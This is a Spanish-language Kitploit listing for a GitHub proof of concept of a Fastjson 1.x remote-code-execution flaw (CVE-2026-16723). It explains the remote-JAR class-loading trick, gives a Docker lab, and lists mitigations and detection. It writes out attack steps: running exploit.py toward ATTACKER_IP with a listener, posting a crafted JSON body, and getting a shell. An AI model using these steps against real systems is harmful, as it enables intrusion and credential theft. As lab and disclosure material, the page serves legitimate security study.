Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-16723 — Exploit PoC para RCE en Fastjson (CVE-2026-16723) que incluye generación automatizada de payloads JAR y entrega mediante JSON manipulado, evadiendo las restricciones de AutoType. | Kitploit
Herramientas/GitHubGitHub/eqstlab/cve-2026-16723
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónRed TeamingDesarrollo de Payloads
GitHubeqstlab/cve-2026-16723

CVE-2026-16723

Exploit PoC para RCE en Fastjson (CVE-2026-16723) que incluye generación automatizada de payloads JAR y entrega mediante JSON manipulado, evadiendo las restricciones de AutoType.

Ver Repositorio
1hace 22 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


Resumen

CVE-2026-16723 es una vulnerabilidad de ejecución remota de código (RCE) en Fastjson 1.x (1.2.68 – 1.2.83). Cuando Fastjson analiza JSON controlado por el atacante, un valor @type manipulado se convierte en una búsqueda de recurso de clase dentro de checkAutoType. En un fat-JAR ejecutable de Spring Boot, el cargador de clases resuelve ese nombre como una URL jar:http:// y obtiene un JAR remoto (SSRF), luego carga una clase que lleva la anotación @JSONType aunque AutoType esté deshabilitado. Debido a que un JDK / Tomcat moderno rechaza el nombre binario jar:http://, la variante fiable inserta el JAR en la caché de la JVM y lo vuelve a leer a través de jar:file:/proc/self/fd/N, de modo que la clase se define y su inicializador estático se ejecuta, otorgando ejecución de código. AutoType permanece deshabilitado y no se requiere ningún gadget de classpath.


Versiones afectadas

CategoríaVersión
VulnerableFastjson 1.2.68 ≤ versión ≤ 1.2.83
CorregidoMigrar a Fastjson 2.x (no hay una versión 1.x corregida)

Impacto

  • Ejecución remota de código como la cuenta de servicio
  • Divulgación de secretos / credenciales del host y del entorno
  • Compromiso total de la aplicación afectada

Entorno

El objetivo del laboratorio es una tienda pública (Northwind Store) cuya API de búsqueda vincula su cuerpo de solicitud con Fastjson. Todo es el valor predeterminado de fábrica de Fastjson: SafeMode desactivado, AutoType desactivado, empaquetado como un fat-JAR de Spring Boot.

root@kitploit:~
docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
PrecondiciónEstado en este laboratorio
Fastjson 1.2.68 – 1.2.831.2.83
fat-JAR ejecutable de Spring Bootsí
Ruta de análisis JSON sin autenticaciónPOST /api/products/search
SafeMode / AutoTypepredeterminado (ambos desactivados)

PoC

El atacante y el objetivo se ejecutan en la misma red puente de Docker, por lo que el objetivo alcanza al atacante como una conexión saliente (no se publica ningún puerto adicional).

Paso 1. Confirmar que el objetivo está activo

root@kitploit:~
curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

Paso 2. Ejecutar el exploit en la máquina del atacante

exploit.py construye el JAR de payload, lo sirve, inicia un listener e imprime el cuerpo de la solicitud. Solo se requiere la dirección de callback.

root@kitploit:~
python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

Paso 3. Entregar el payload

Pega el cuerpo impreso en el endpoint de búsqueda (Burp Repeater o curl) y envíalo. La solicitud de búsqueda es una funcionalidad normal; solo su cuerpo JSON está manipulado.

root@kitploit:~
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

Paso 4. Confirmar el resultado

El código se ejecuta como la cuenta de servicio. Recupera la flag a través de la shell obtenida:

root@kitploit:~
whoami

Mitigación

  • Migrar a Fastjson 2.x
  • O ejecutar com.alibaba:fastjson:1.2.83_noneautotype
  • O iniciar la JVM con -Dfastjson.parser.safeMode=true
  • Detección: valores JSON @type que contienen patrones jar:http o jar:file / /proc/self/fd

Análisis

  • KR:
  • EN:
Descargar herramienta